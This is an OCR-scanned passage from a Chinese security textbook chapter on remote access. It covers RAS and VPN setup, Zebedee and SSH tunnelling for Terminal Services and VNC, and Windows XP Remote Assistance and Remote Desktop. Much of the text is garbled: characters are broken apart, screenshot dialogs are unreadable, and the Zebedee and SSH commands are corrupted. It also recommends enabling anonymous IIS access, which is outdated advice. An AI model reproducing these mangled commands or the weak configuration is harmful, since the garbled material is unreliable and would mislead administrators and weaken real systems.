计算 机 访问 整个 本 地 网 络 。 这 台 设 置 好 的 计算 机 即 被 称 为 远程 访问 服务 器 。 


632 客户 端 设置 


下 面 设置 远程 访问 客户 端 连接 远程 访问 服务 器 。 在 远程 访问 客户 端 上 新 建 连接 ,如 
图 6. 10 所 示 。 选 中 “拨号 到 专用 网 络 " 单 选 按钮 ,设置 网 络 连接 的 类 型 。 
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网 络 连接 向 导 


网 络 连接 类 型 
根据 网 络 配置 和 联网 大 要 ， 您 可 以 半 择 要 自 娃 的 网 结 连接 类 型 A) 
d 


号 号 到 专用 网络 起 间 

用 我 的 电话 线 员 制 解 凋 器 或 ISDN 连接 。 

个 搓 号 到 Internet @) 

用 我 的 电话 线 (调制 解 凋 器 或 ISDN 连接 到 Internet。 


个 通过 Internet 连接 到 专用 网 络 (Y) 
Internet 创建 虚拟 专用 网 络 VFN) 连接, 即 “ 隆 道 ”。 


三 接受 传 入 的 连接 CN) 

让 其 它 计算 机 使 用 电话 贱 ，Internet 或 用 电 阔 直接 连接 到 我 的 计算 机 。 
个 直接 连接 到 另 一 台 计算 机 (Cc) 

使 用 我 的 串 行 、 并 行 或 红外 端口 连接 。 


《上 一 步 0 [下 =- 步 四 )] 取消 


图 6.10 设置 网 络 连接 类 型 


单 击 “ 下 一 步 "按钮 ,选择 拨号 时 使 用 的 设备 ,弹出 如 图 6. 11 所 示 对 话 框 ,在 “电话 号 码 ” 
文本 框 中 输入 远程 访问 服务 器 的 电话 号 码 ,然后 按照 向 导 提示 就 可 以 建立 与 远程 访问 服务 
器 的 连接 。 


要 拔 的 电话 号 码 
您 必须 指定 要 连接 双 jg 计算 机 或 网 络 的 电话 号 码 。 


国 a 全 et 舞 机 避 绩 的 祝 尖 入 台 前 玫 和 起 让 作 的 计算 机 末 自 动 奖 
区 号 电话 号 码 EF); 
po 


国家 吨 区 ) 号 加 


厂 使 用 氢 号 规则 UD 


《上 -- 步 @) [下 - 步 四 )] 取消 
图 6.11 输入 远程 访问 服务 器 的 电话 号 码 


利用 RAS( 远 程 访问 服务 器 ) 的 方式 进行 远程 访问 给 用 户 带 来 了 方便 ,可 是 这 种 方式 也 
有 如 下 两 个 缺点 : 

@ 由 于 RAS 服务 器 是 利用 电话 号 码 来 提供 服务 (电话 线 要 捅 到 modem 上 ) ,所 以 在 同 
一 时 刻 只 允许 一 个 用 户 连 接 。 如 果 要 满足 多 个 用 户 同 时 连接 的 请 求 ,那么 RAS 服务 器 必须 
有 多 个 modem, 这 就 增加 了 硬件 费用 。 

@ 由 于 客户 端 计算 机 必须 拨 RAS 的 电话 号 码 , 如 果 客 户 端 与 服务 器 位 于 不 同 的 城市 
甚至 不 同 的 国家 ,那么 因此 所 带 来 的 电话 费用 是 很 大 的 。 

鉴于 RAS 方式 有 上 述 的 缺点 ,在 实际 应 用 中 一 般 采 用 另外 一 种 远程 访问 方式 : VPN。 

VPN 与 RAS 的 区 别 : 提供 远程 访问 服务 的 VPN 服务 器 不 是 用 电话 号 码 ,而 是 用 IP 
地 址 来 标识 自己 ,因此 就 要 求 VPN 服务 器 必须 有 一 个 公有 IP 地 址 。 由 于 IP 地 址 是 逻辑 
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的 ,所 以 可 以 同时 接受 多 个 用 户 的 访问 请 求 , 只 要 有 一 个 硬件 能 够 提供 到 Internet 的 连接 就 
可 以 了 ,因此 降低 了 硬件 的 费用 。 对 客户 端 计算 机 来 说 如 果 要 访问 VPN 服务 器 ,只 要 先 连 
接 到 Internet 上 获得 一 个 在 互联 网 上 唯一 的 公有 IP 地 址 ,然后 再 去 拨 VPN 服务 器 的 公有 
IP 地 址 ,就 可 以 建立 与 VPN 服务 器 的 连接 。 此 次 连接 的 费用 也 只 是 双方 连接 到 当地 的 
ISP 所 需要 的 电话 费 , 避 免 了 RAS 方式 所 带 来 的 昂贵 的 电话 费 。 由 于 双方 都 采用 公有 IP 
地 址 来 标识 自己 ,而 公有 IP 在 互联 网 上 是 唯一 的 ,所 以 看 起 来 就 像 是 在 Internet 上 为 这 两 
台 计 算 机 专门 开辟 了 一 条 通道 一 样 ,所 以 被 称 之 为 “虚拟 专 有 网 络 ”。 

VPN 服务 器 的 设置 与 RAS 服务 器 类 似 , 在 要 作为 VPN 服务 器 的 计算 机 上 打开 路 由 和 
远程 访问 控制 台 , 启 动 路 由 和 远程 访问 服务 ,在 服务 器 类 型 中 选中 “虚拟 专用 网 络 (VPN) 服 
务 器 ” 单 选 按 钮 ,然后 按照 向 导 提 示 就 可 以 把 计算 机 配置 为 VPN 服务 器 ,如 图 6.12 所 示 。 


路 由 和 远程 访问 最 务 器 安装 向 导 划 


公共 设置 
您 可 以 从 一 些 公共 配置 中 选择 。 


个 Internet 连接 服务 器 江 ) 
使 网 络 上 的 所 有 计算 机 能 连接 到 | Internet。 


个 手动 配置 服务 器 人 @) 
用 默认 设置 启动 服务 器 . 


《 上- 步 四 [下 - 步 中 "| 取消 
图 6.12 选择 创建 虚拟 专用 网 络 (VPN) 服 务 器 


在 VPN 客户 端 上 新 建 连接 ,在 网 络 连接 类 型 中 选中 * 通 过 Internet 连接 到 专用 网 络 " 单 
选 按钮 ,如 图 6. 13 所 示 。 


GEE 


同 络 连接 类 型 
根据 网 络 配置 和 联网 需要 ， 您 可 以 达 择 要 自 建 的 网 结 这 接 尖 型 2) 


个 技 号 到 专用 网 络 了 ) 
用 我 的 电话 上 (调制 解 调 器 或 ISDN 连接 。 


be Internet (D) 
我 的 电话 线 ( 凋 制 解 调 器 或 ISDN) 连 接 到 Internet。 


通过 Internet 连接 到 专用 同 络 @ji 


0 即 “隧道 ”。 


三 共 受 传 入 的 连接 
人 se Internet 或 用 电 绕 直接 和 连接 到 我 的 计算 机 。 


ey 
请 


《上 -- 步 四 [- 步 四 )] 取消 


图 6.13 选择 网 络 连接 类 型 
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络 与 信息 安全 基础 


单 击 * 下 一 步 ? 按 钮 ,弹出 图 6. 14 所 示 ( 目 标 地 址 ) 对 话 框 ,在 此 应 输入 所 要 连接 的 VPN 
服务 器 的 主机 名 或 IP 地 址 ,然后 按照 向 导 提 示 就 可 以 建立 与 VPN 服务 器 的 连接 。 


网 络 连接 向 导 


目标 地 址 
目标 的 名 称 或 地 址 是 什么 ? gf | 
多 


输入 您 正 连接 的 计算 机 或 网 络 的 主机 名 或 IP 地 址 。 


主机 名 或 IP 地 址 @0 nierosoft. com 或 123.45.6.78) o: 
110. 6. 185. 32| 


《上 - 步 四 [下 - 步 四 )] 取 滑 


图 6.14 输入 VPN 服务 器 的 IP 地址 


6.4 Windows 2000 远程 控制 的 三 种 安全 解决 方法 


远程 控制 中 最 明显 的 问题 是 客户 端 机 器 和 服务 器 的 通信 要 通过 Internet, 这 样 交换 的 
数据 就 可 能 被 黑客 侦 听 到 。 还 有 一 个 问题 就 是 远程 控制 本 身 漏洞 (例如 开放 特定 的 端口 ) 也 
会 导致 网 络 攻击 。 选 择 远程 控制 方案 最 终 的 目标 是 要 保证 作为 网 关 的 用 户 能 控制 服务 器 不 
被 攻击 。 

尽管 Windows 2000 操作 系统 中 实现 远程 控制 有 很 多 种 方法 。 并 不 是 所 有 的 软件 都 符 
合 远程 控制 方案 安全 原则 ,用 户 可 以 通过 组 合 不 同 的 软件 来 完成 所 需要 的 远程 控制 解决 
方案 。 

下 面 的 一 些 例子 就 是 通过 对 Windows 2000 操作 系统 自 带 服务 或 者 第 三 方 软件 组 合 使 
用 来 达到 安全 可 靠 的 远程 控制 。 


64.1 Windows 2000 终端 服务 结合 Zebedee 软件 的 使 用 


终端 服务 是 在 Windows 2000 中 提供 的 允许 用 户 在 一 个 远 端 的 Windows 2000 服务 器 
上 执行 基于 Windows 的 应 用 程序 的 技术 。 终 端 服务 应 该 是 Windows 2000 服务 器 进行 远 
程 管理 使 用 最 多 的 办 法 ,这 和 它 的 使 用 便利 性 以 及 其 属于 Windows 内 置 的 服务 同时 带 来 的 
其 他 好 处 有 关 , 比 如 可 以 使 用 Windows 2000 服务 器 自 带 的 认证 系统 。 但 是 这 个 终端 服务 
程序 本 身 有 一 些 缺 陷 : 无 法 对 用 户 连接 IP 作出 限制 ; 没有 明确 提出 改变 默认 监听 端口 的 办 
法 ; 没有 日 志 记 录 工 具 。 单 独 使 用 终端 服务 并 不 安全 ,但 可 以 通过 与 Zebedee 软件 结合 , 实 
现 上 面 的 远程 管理 安全 需要 。Zebedee 软件 的 主 界面 如 图 6.15 所 示 。 

Zebedee 监听 本 地 指定 的 应 用 ,将 要 传输 的 TCP 或 UDP 数据 进行 加 密 、 奈 缩 ; 客户 端 
与 服务 器 端 之 间 建 立 一 个 通信 隧道 ; 压缩 .加 密 的 数据 通过 隧道 进行 传输 ; 可 以 令 多 个 
TCP 或 UDP 的 连接 建立 在 同一 个 TCP 连接 之 上 。 
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DEPAUL FIGURATION FILE — EDIT BEFORE USE 
waiting for connection on port 11965 


图 6.15 Zebedee 程序 主 界面 


通常 使 用 Zebedee 分 为 以 下 两 步 

OO 配置 Zebedee 的 监听 端口 ,使 用 到 如 下 的 命令 : C:\zebedee-s-o server. log。 

@ 在 客户 机 上 配置 监听 3389 端口 并 且 使 它 重 定向 到 用 户 服务 器 上 Zebedee 的 监听 端 
口 ,使 用 命令 如 下 : C:\ 记 zededee 3389 serverhost:3389 

Zebedee 启动 后 , 它 与 终端 服务 的 结合 使 用 原理 如 图 6. 16 所 示 。 当 开启 终端 服务 的 客 
户 端 进程 (目标 TCP 端口 3389) 时 ,本 地 Zebedee 客户 端 开始 截取 数据 包 ; Zebedee 将 数据 
加 密 、 压 缩 后 发 给 Zebedee 服务 器 (这 里 Zebedee 服务 默认 端口 11965); Zebedee 服务 器 接 
收 后 再 解压 缩 、 解 密 传输 给 服务 器 的 服务 (服务 端口 TCP:3389)。 这 里 服务 器 上 的 终端 服 
务 好 像 是 与 本 地 的 终端 服务 客户 端 进行 的 连接 ,但 实际 上 所 有 传输 的 数据 包 都 经 过 了 一 个 
加 密 的 隧道 。 此 外 ,Zebedee 还 可 以 通过 配置 文件 来 实现 身份 认证 、 加 密 、IP 地 址 过 滤 以 及 
日 志 功 能 。 一 个 配置 良好 的 Zebedee 和 Windows 2000 的 终端 服务 相互 结合 ,可 以 构建 


个 十 分 安全 的 远程 管理 系统 


监听 TCP 端 口 3389 


终端 客户 


i 


Zebedee Zebedee 
监听 TCP 端 口 3389 监听 TCP 端 口 11965 


图 6.16 结合 Zebedee 的 终端 服务 原理 图 
鉴于 一 般 终端 服务 不 提供 文件 传输 的 功能 ,所 以 需要 考虑 其 他 的 办 法 。 可 以 使 用 FTP 


服务 器 。 但 FTP 服务 器 通常 被 认为 是 不 安全 的 ,也 可 以 通过 Zebedee 的 加 密 隧 道 增 强 其 安 
全 性 ,方法 是 直接 在 终端 服务 上 传输 数据 。 
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642 在 SSH 上 使 用 VNC 软件 


VNC(Virtual Network Computing) 是 著名 的 远程 管理 工具 ,类 似 Windows 2000 的 终 
端 服务 ,相对 于 其 他 管理 工具 ,VNC 有 自己 不 少 的 特点 : 

。 客户 端 活动 如 掉 线 不 会 影响 到 服务 端 , 再 次 连接 就 可 以 了 。 

。 客户 端 无 须 安装 ,甚至 用 IE 等 浏览 器 就 可 控制 服务 端 。 

。 最 大 的 优点 就 是 真正 跨 平台 使 用 ,用 户 可 以 在 Windows 下 用 客户 端 远 程控 制 

UNIX, 反 之 亦 然 。 默 认 端 口 是 5800、5900, 该 版 本 是 运行 在 x86 Win32 下 的 完整 安 
装 包 ,可 自行 选择 安装 服务 端 或 客户 端 。 

VNC 是 一 个 类 似 于 终端 服务 的 远程 管理 软件 ,和 终端 不 同 的 地 方 有 以 下 几 点 : 

。 VNC 和 当前 正在 登录 的 用 户 共用 同一 个 会 话 , 可 以 与 当前 登录 的 用 户 同时 操作 。 

。， VNC 客户 端 适用 于 不 同 的 平台 ,包括 Windows CE 和 Java。 

”VNC 能 够 限制 IP 访问 。 

。 在 客户 端 和 服务 器 端 没 有 经 过 加 密 。 

最 大 的 问题 是 VNC 的 数据 传输 没有 经 过 加 密 。 用 户 可 以 配合 使 用 SSH 加 密 来 弥补 
这 一 缺陷 。 通 常 使 用 Open SSH( 可 以 从 http://www. networksimplicity. com/openssh 站 
点 下 载 )。Open SSH 是 类 似 于 Zebedee 的 软件 。 但 是 它 更 广泛 地 应 用 于 SMTP、HTTP、 
FTP、POP3 和 Telnet 传输 数据 包 加 密 。 和 Zebedee 一 样 , 它 是 通过 端口 通信 隧道 ,不 同 的 
是 SSH 已 经 成 为 广大 用 户 公认 的 加 密 协议 。 

从 概念 上 讲 OpenSSH 转发 数据 包 和 Zebedee 相似 。 通 常 可 以 配置 服务 器 的 监听 端口 
(OpenSSH 默认 端口 为 22) ,连接 到 SSH 使 用 的 端口 。 一 个 SSH 客户 端 实 质 上 是 一 个 加 密 
的 Telnet 和 远程 访问 控制 提示 符 。 但 SSH 也 能 用 同样 一 个 控制 提示 符 给 其 他 的 协议 连接 进 
行 加 密 。 下 面 两 个 步 又 实现 在 SSH 基础 上 的 VNC 远程 控制 。 

GD C:\ 二 ssh L5901:serverhost:5900serverhost, 创 建 一 个 SSH 服务 器 端口 对 VNC 在 
本 地 和 服务 器 数据 包 之 间 的 转发 。 

加 CN\>vncviewer:1, 如 图 6.17 所 示 。 实 际 上 是 一 个 VNC 会 话 通过 SSH 加 密 通 道 
进行 传输 (这 种 传输 是 在 VNC 服务 器 和 客户 端 之 间 进 行 ) 。 

VNC 使 用 者 监听 TCP 端 口 5900 


“rs 
| 色 ] 


监听 TCP 端 口 5901 监听 TCP 端 口 22 


图 6.17 通过 SSH 基础 上 的 VNC 远程 控制 包 传 输 


SSH 服 务 器 端 


用 户 使 用 多 用 户 平 台 时 也 能 够 使 用 在 SSH 基础 上 的 VNC 远程 控制 ,因为 VNC 和 
SSH 都 支持 常用 的 操作 系统 。 


可 以 通过 Windows 2000 Server 系统 自 带 的 管理 工具 管理 远程 交互 ,例如 客户 机 可 以 
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通过 映射 服务 器 的 驱动 器 来 管理 远程 接 人 管理 。 当 然 也 可 以 使 用 其 他 的 网 络 服务 达到 远程 
控制 的 目的 。Windows 2000 Server 远程 管理 是 通过 打开 连接 服务 器 的 445 端口 ,通过 这 个 
端口 对 交换 数据 进行 转发 。 但 是 在 客户 和 服务 器 之 间 的 数据 没有 经 过 加 密 , 这 就 会 导致 一 
些 网 络 攻击 ,但 是 用 户 可 以 使 用 另外 一 些 加 密 隧 道 技 术 。 网 络 隧 道 技术 指 的 是 利用 一 种 网 
络 协议 来 传输 另 一 种 网 络 协议 ,主要 利用 网 络 隧道 协议 来 实现 这 种 功能 。 利 用 L2TP 隧道 
协议 来 对 交换 数据 进行 传输 ,安全 性 得 到 极 大 的 加 强 。 

VPN 技术 在 Windows 2000 远程 控制 的 应 用 有 如 下 优点 。 

。 VPN 致力 于 为 网 络 提供 整体 的 安全 性 ,是 性 价 比较 高 的 安全 方式 。 

。 VPN 的 管理 性 能 提高 得 很 快 ,管理 工作 站 可 以 直接 提供 多 单元 的 支持 。 
VPN 使 用 L2TP 加 密 通道 是 虚拟 专用 拨号 网 络 协 议 。 
VPN 能 够 限制 IP 访问 。 

。 VPN 可 以 在 网 络 连 接 中 透明 地 配置 ,而 不 需要 修改 网 络 或 客户 端的 配置 。 

完成 服务 器 和 客户 端的 配置 之 后 ,可 以 看 见 一 个 VPN 连接 图 标 。 双 击 该 图 标 , 根 据 提 
示 填 和 人 用 户 名 和 密码 ,就 能 连接 到 服务 器 。 


6.5 Windows XP 系统 中 的 远程 控制 


G5.1 


Windows XP 远程 协助 的 应 用 


“远程 协助 ?是 Windows XP 附带 提供 的 一 种 
简单 的 远程 控制 的 方法 。 远 程 协助 的 发 起 者 通过 


IT =151x 
文 位 联系 人 (C) | 操作 (&) 工具 (TD) 玫 助 () 


MSN Messenger 向 Messenger 中 的 联系 人 发 出 ed | a 六 
协助 要 求 ,在 获得 对 方 同意 后 , 即 可 进行 远程 协 EE i ER 
助 ,远程 协助 中 被 协助 方 的 计算 机 将 暂时 受 协助 一 一 二 3 zp 
方 (在 远程 协助 程序 中 被 称 为 专家 ) 的 控制 ,专家 | 人 和 全 
可 以 在 被 控 计算 机 当中 进行 系统 维护 ,安装 软件 、 | 有 中 区 KGD) 
处 理 计算 机 中 的 革 些 问题 或 者 向 被 协助 者 演示 某 |、 时 于 
些 操作 。 加 遇 uere aa 

如 果 用 户 安装 的 是 MSN Messenger 6.1, 还 | 训 So oo 
需要 安装 Windows Messenger 4. 7 才能 够 进行 局 究 灾 - 稚 舟 。。。“( 信 剑 ) - 有 事 结 我 ， 
“远程 协助 *。 使 用 远程 协助 时 ,可 在 MSN |@ 这 和 0) 
Messenger 的 主 界面 中 选择 “操作 ”|“ 请 求 远程 协 | 间 间 xB ee 
助 "选项 ,如 图 6. 18 所 示 。 然 后 在 弹出 的 “请 求 远 国 ee 
程 协助 ”对话 框 中 选择 要 邀请 的 联系 人 ,如 图 6. 19 B xhupe i) 
所 示 。 当 邀请 被 接受 后 会 弹出 “远程 协助 程序 对 “| 合 
话 框 ,被 洲 人 单 击 “ 远 程 协 助 ” 对 话 框 中 的 “接管 控 地 件 、 革 呈现 证 
制 权 * 按 钮 就 可 以 操纵 邀请 人 的 计算 机 了 。 > pr 二 


双方 可 以 在 “远程 协助 ”对 话 框 中 输入 消息 、 
交谈 和 传输 文件 ,就 如 同 在 MSN Messenger 中 一 


图 6.18 MSN 中 请 求 远 程 协助 
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站 


BEE 


p< 我 的 联系 人 (C) 
请 从 振作 起 与 其 进行 远程 协助 的 人 的 名 字 ， 然后 单 击 “确定 ”。 


进 (#) 沈 虹 ( 敲 开 ) 2 mi 
昌 kt- : ) 自己 结 儿子 技 毛 又 省 .， 
iuGang 


| 
6.19 选择 进行 远程 协助 的 人 员 


样 。 被 控 方 如 果 想 终止 远程 协助 ,可 按 Esc 键 或 单 击 * 终 止 控制 ?按钮 即 可 。 
652 Windows XP “远程 桌面 "的 应 用 


使 用 远程 协助 进行 远程 控制 实现 起 来 非常 简单 ,但 它 必须 由 主 控 双方 协同 才能 够 进行 ， 
所 以 Windows XP 专业 版 中 又 提供 了 另 一 种 远程 控制 方式 一 一 “远程 桌面 ”, 利 用 “远程 桌 
面 ”, 用 户 可 以 在 远离 办 公 室 的 地 方 通过 网 络 对 计算 机 进行 远程 控制 。 即 使 主机 处 在 无 人 状 
况 ,“ 远 程 桌面 "仍然 可 以 顺利 进行 ,远程 操作 的 用 户 可 以 通过 这 种 方式 使 用 计算 机 中 的 数 
据 、 应 用 程序 和 网 络 资源 , 它 也 可 以 让 用 户 的 同事 访问 到 用 户 的 计算 机 的 桌面 ,以 便于 进行 
协同 工作 。 


1. 配置 “远程 桌面 "主机 


“远程 桌面 ”的 主机 必须 是 安装 了 Windows XP 的 计算 机 ,必须 与 Internet 连接 并 拥有 
合法 的 公 网 IP 地 址 。 主 机 的 Internet 连接 方式 可 以 是 普通 的 拨号 方式 ,因为 “远程 桌面 " 仅 
传输 少量 的 数据 (如 显示 器 数据 和 键盘 数据 ) 便 可 实现 远程 控制 。 

要 启动 Windows XP 的 远程 桌面 功能 必须 以 管理 员 或 Administrators 组 成 员 的 身份 登 
录 系 统 。 

右 击 “ 我 的 电脑 ”, 在 弹出 的 快捷 菜单 中 选择 “属性 ”。 在 弹出 的 系统 属性 对 话 框 中 单 击 
“远程 ”标签 ,打开 “远程 ”选项 卡 选 中 “启用 这 台 计 算 机 上 的 远程 桌面 " 复 选 框 ,如 图 6. 20 所 
示 。 单 击 “ 选 择 远 程 用 户 ” 按 钮 ,然后 在 “远程 桌面 用 户 ” 对 话 框 中 单 击 “ 添 加 ”按钮 ,弹出 “ 选 
择 用 户 ” 对 话 框 。 

单 击 “ 位 置 ”按钮 ,用 以 指定 搜索 位 置 ; 单 击 “ 对 象 类 型 "按钮 以 指定 要 搜索 对 象 的 类 型 。 
在 “输入 对 象 名 称 来 选择 ”对 话 框 中 ,输入 要 搜索 的 对 象 名 称 , 单 击 “ 检 查 名 称 ” 按 钮 ,等 找到 
用 户 名 称 后 , 单 击 “ 确 定 ” 按 钮 ,返回 到 “远程 桌面 用 户 ” 对 话 框 ,找到 的 用 户 会 出 现 对话 框 中 
的 用 户 列表 中 。 

如 果 没 有 可 用 的 用 户 , 可 以 使 用 “控制 面板 ”中 的 “用 户 账户 ”来 创建 ,所 有 列 在 “远程 桌 
面 用 户 ? 列 表 中 的 用 户 都 可 以 使 用 远程 桌面 连接 这 人 台 计 算 机 ,如 果 是 管理 组 成 员 即 使 没 在 这 
里 列 出 也 拥有 连接 的 权限 。 
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EE3E3 | 


人 一 一 一 一 [ ln! Wem | 


友 启用 远程 协助 并 允许 从 这 各 计算 机 发 送 六 请 组) 


了 解 有 关 远 程 协助 的 更 多 信息 - 
高 级 呈 .， 
运程 桌面 


局 用 这 台 计算 机 上 的 远程 不 面 到) 


图 6.20 启动 远程 协助 


2. 客户 端 软件 的 安装 


选择 “开始 ”|* 所 有 程序 "|* 附 件 "|* 通 讯 ? 选 项 .启用 Windows XP 系统 自 带 的 “远程 桌 
面 连接 ?程序 来 连接 远程 桌面 。 如 果 用 户 使 用 的 操作 系统 是 Windows 9x/2000, 可 安装 
Windows XP 安装 光盘 中 的 “远程 桌面 连接 "客户 端 软件 。 

在 光驱 中 插入 Windows XP 安装 光盘 ,在 弹出 的 “欢迎 ”界面 中 , 单 击 “ 执 行 其 他 任务 ” 按 
钮 ,在 弹出 的 界面 中 选中 “设置 远程 桌面 连接 ”选项 ,然后 根据 提示 进行 安装 。 


3. 访问 远程 桌面 


在 客户 端 上 运行 “远程 桌面 连接 ”程序 ,弹出 “远程 桌面 连接 "对话 框 , 单 击 “ 选 项 ”按钮 ， 
展开 对 话 框 的 全 部 选项 ,如 图 6. 21 所 示 , 在 “常规 ”选项 卡 中 分 别 输入 远程 主机 的 IP 地 址 或 
域名 、 用 户 名 、 密 码 , 然 后 单 击 “ 连 接 " 按 钮 ,连接 成 功 后 将 打开 “远程 桌面 "窗口 ,用 户 可 以 看 
到 远程 计算 机 上 的 桌面 设置 .文件 和 程序 ,而 该 计算 机 会 保持 在 锁定 状态 ,如 果 没 有 密码 , 任 
何人 都 无 法 使 用 它 。 

如 果 要 注销 和 结束 “远程 桌面 ", 可 在 “远程 桌面 窗口 中 , 单 击 * 开 始 "|* 注 销 ?按钮 ,然后 
按 常规 的 用 户 注销 方式 进行 注销 。 


“远程 桌面 "的 Web 连接 


“远程 桌面 ?还 提供 了 一 个 Web 连接 功能 ,简称 “远程 桌面 Web 连接 ”, 这 样 客户 端 不 需 
要 安装 专用 的 客户 端 软件 也 可 以 使 用 “远程 桌面 ”功能 ,这 样 对 客户 端的 要 求 更 低 ,使 用 也 更 
灵活 ,几乎 任何 可 运行 IE 浏览 器 的 计算 机 都 可 以 使 用 “远程 桌面 ”功能 。 

由 于 “远程 桌面 Web 连接 ?是 Internet 信息 服务 (IS) 中 的 可 选 的 WWW 服务 组 件 , 因 
此 ,要 让 Windows XP 主机 提供 “远程 桌面 Web 连接 ”功能 ,必须 先行 安装 该 组 件 。 


123 


124 


ETTES ele 


富 规 | 显示 | 本 地 资源 | 程 计 | 高 级 | 安全 | 


三 登录 设置 
相 键入 计算 机 各， 或 者 从 下 拉 列 表 中 选择 一 台 计算 机 。 


计算 机 @)s i7217.11.11| -| 
用 己 名 中: [ministrator 


厂 保存 客 码 &) 


三 连接 设置 
[ 保存 当前 设置 ， 或 者 打开 已 保存 的 连接 。 


取消 天助 中 选项 @) < 


6. 21 “远程 桌面 连接 ”对话 框 


方法 是 : 选择 “控制 面板 ”| 添加 或 删除 程序 ?选项 ,在 弹出 的 “添加 或 删除 程序 ?对 话 框 
中 选择 “添加 /删除 Windows 组 件 ? 选 项 ,在 "Windows 组 件 向 导 ” 对 话 框 中 选择 “Internet 信 
息 服务 (IIS)" 复 选 框 ,如 图 6. 22 所 示 。 


到 
， 请 单 。 灰 色 框 表示 只 会 安装 说 姐 | 

EE Ee 
应 用 程序 服务 器 的 子 组 件 人 ) 

加 依据 用 网 络 co 访问 0.0 上 

口 区 局 用 网 络 DTC 访问 0.0 上 

口 惑 消息 队列 6.5 辐 

口 篇 应 用 程序 服务 器 控制 台 0m 辐 


描述 ITS 包括 Web,FTP ,SWTP 和 NTP 支持 ， 忆 FrontPage Server 
Extension 和 hetive Server PR Ge 


所 需 磁 盘 空间 3.3 上 详细 信息 中 ). 
可 用 磁盘 空间 : T071.0 可 
[es | 


6.22 选择 Internet 信息 服务 (IIS) 组 件 


单 击 “ 详 细 信 息 " 按 钮 ,弹出 如 图 6. 23 所 示 的 “Internet 信息 服务 (1IS) ”对话 框 ,选中 “万 
维 网 服务 ”| “远程 桌面 Web 连接 " 复 选 框 ,如 图 6. 24 所 示 , 单 击 “ 确 定 ” 按 钮 后 返回 到 
“Windows 组 件 向 导 ” 对 话 框 ,并 单 击 “ 下 一 步 ” 按 钮 ,开始 安装 组 件 。 

选择 “管理 工具 ”|“Internet 信息 服务 ?选项 ,选择 一 个 可 用 的 网 站 , 右 击 并 选择 * 属 
性 ”命令 。 在 弹出 的 “默认 网 站 属性 ”对 话 框 中 打开 “目录 安全 性 ”选项 卡 ,如 图 6. 25 所 
示 , 单 击 “ 身 份 验证 和 访问 控制 ”选项 组 中 的 “编辑 ”按钮 ,在 弹出 的 “身份 验证 方法 ”对 话 
框 中 选中 “启用 匿名 访问 ” 复 选 框 即 可 ,如 图 6. 26 所 示 ,这 样 用 户 就 可 以 用 下 浏览 器 访问 
远程 桌面 了 。 
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x 
要 添 个 组 件 ， 让 灰色 框 表示 只 会 安装 该 姐 件 的 一 
部 分 。 件 内 容 ， 博 单 ; 让 
Internet 信息 服务 [TS) 的 子 组 件 CC)- 


DD rp service 10m 4 
OD EasMP Service 1.2 上 
回合 公用 文件 1.0 皮 
口 侈 后 台 智 能 传送 骤 务 (BITS) 服务 器 扩展 0.2 上 


口 同文 件 传 辆 协议 FTP) 服 务 0.1 旧 写 
描述 ， 一 个 IIS 的 信心 组 件 使 用 JITP 协议 来 与 TCP/IP 网 络 上 的 Web 客 
总 上座 


ea EE 
确定 取消 


图 6.23 选择 WWW 服务 组 件 


四 
和 


万 维 网 服务 的 子 组 件 人) 
口 加 Internet 数据 连接 器 
口 回 YebpAy 发 布 0.0 虽 
回 天 万 淮 网 服务 

口 名 远程 管理 om) 


口 问 在 服务 器 端的 包 合 文 件 
描述 。 管理 终端 服务 客户 端 Web 连接 的 ActiveX 控件 和 范例 页 面 


所 需 磁 盘 宝 间 : 3.7 A 
可 用 磁盘 空间 - 7066.4 有 | 
区 二 Eu 
图 6.24 选择 远程 桌面 Web 连接 
vx 
网 | 性 第 | IsNI 知 和 器 | 主 B 录 | 文才 | 
目录 安 人 性 | mre 头 | 自 证 义 氏 误 | AspaT | 
| 身份 验证 和 访问 控制 


好 区 全 坊间 汪 允 网 本 身 夫 福王 放 


LE 


「 严 地 址 和 城 名 限制 一 一 - 
局 吓 抽 “5 
编 往 ，， 


EE 关 和 人 和 服务 器 证 书 G) 
到 面 
编辑 四 ) 


确定 | 取消 Ez 和 二 
图 6.25 设置 网 站 目录 安全 性 


远程 访问 技 | 
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| 
下 对 ENESHRO 
匿名 访问 使 用 下 列 Windows 用 户 帐户 : 
用 记名 WW [SECM 浏览 @). 
EHD: [ne 
用 户 访问 需 经 过 身份 验证 
使 用 以 下 身份 六 


| 条 件 下 ,要 求 用 户 名 和 密码 : 
康 限 制 了 访问 权限 

厢 集成 Windows 身份 验证 @H) 

厂 Windows 域 服务 器 的 摘要 式 身份 验证 [) 


厂 基本 身份 验证 (以 明文 形式 发 送 密码 ) GE) 
厂 .了 ET Passport 身份 验证 ID) 


器 以 域名 | 
有 而 | Ex 


Cw | mw | _ www | 


6.26 “身份 验证 方法 "对话 框 


在 客户 端 运行 浏览 器 ,在 地 址 栏 中 按 “http:// 服 务 器 地 址 (域名 )” 格 式 输入 服务 器 
地 址 ,如 服务 器 地 址 为 127. 0. 0.1, 则 可 在 地 址 栏 中 输入 *http://127. 0.0.1”, 按 Enter 键 ， 
“远程 桌面 Web 连接 ”的 页 面 将 出 现在 下 浏览 器 窗口 中 ,如 图 6. 27 所 示 , 在 网 页 中 的 “地 
址 ” 栏 中 输入 想 要 连接 的 计算 机 名 称 , 单 击 “ 连 接 ” 按 钮 , 便 可 以 连接 远程 桌面 。 


键入 要 合用 9 江 检 it 算 和 1 如 ,过 闫 过 接 


的 屏 杏 大 小 ,全 后 旭 出 这 籍 ， 


党 接 页 打开 对， 您 可以 村 其 声 加 各 称 康 关 ， 
随 化 各 同一 台 计 复 各 的 注 琴 。 


图 6.27 通过 浏览 器 连接 远程 桌面 


除了 “远程 桌面 ”与 远程 协助 外 , Windows XP 还 提供 了 程序 共享 功能 ,在 某 种 意义 上 ， 
它 也 是 一 种 对 程序 的 远程 控制 ,另外 Net Meeting 中 也 具有 程序 共享 功能 。 
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以 上 的 远程 控制 方式 都 必须 在 Windows XP 或 Windows Server 2003 操作 中 才能 进 
行 ,而 且 功 能 相对 简单 。 要 在 其 他 的 操作 系统 中 进行 远程 控制 或 者 需要 远程 控制 提供 更 为 
强大 的 功能 ,就 需要 使 用 第 三 方 远程 控制 软件 。 


6.53 远程 桌面 与 终端 服务 的 区 别 和 联系 


首先 来 看 看 相同 点 ,它们 都 是 Windows 系统 的 组 件 ,都 是 由 Microsoft 公司 开发 的 。 通 
过 这 两 个 组 件 可 以 实现 用 户 在 网 络 的 另 一 端 控制 服务 器 的 功能 ,操作 服务 器 ,运行 程序 就 好 
像 操纵 自己 本 地 计算 机 一 样 简单 ,速度 也 非常 快 。 不 过 这 两 个 组 件 的 区 别 也 是 非常 明显 的 。 

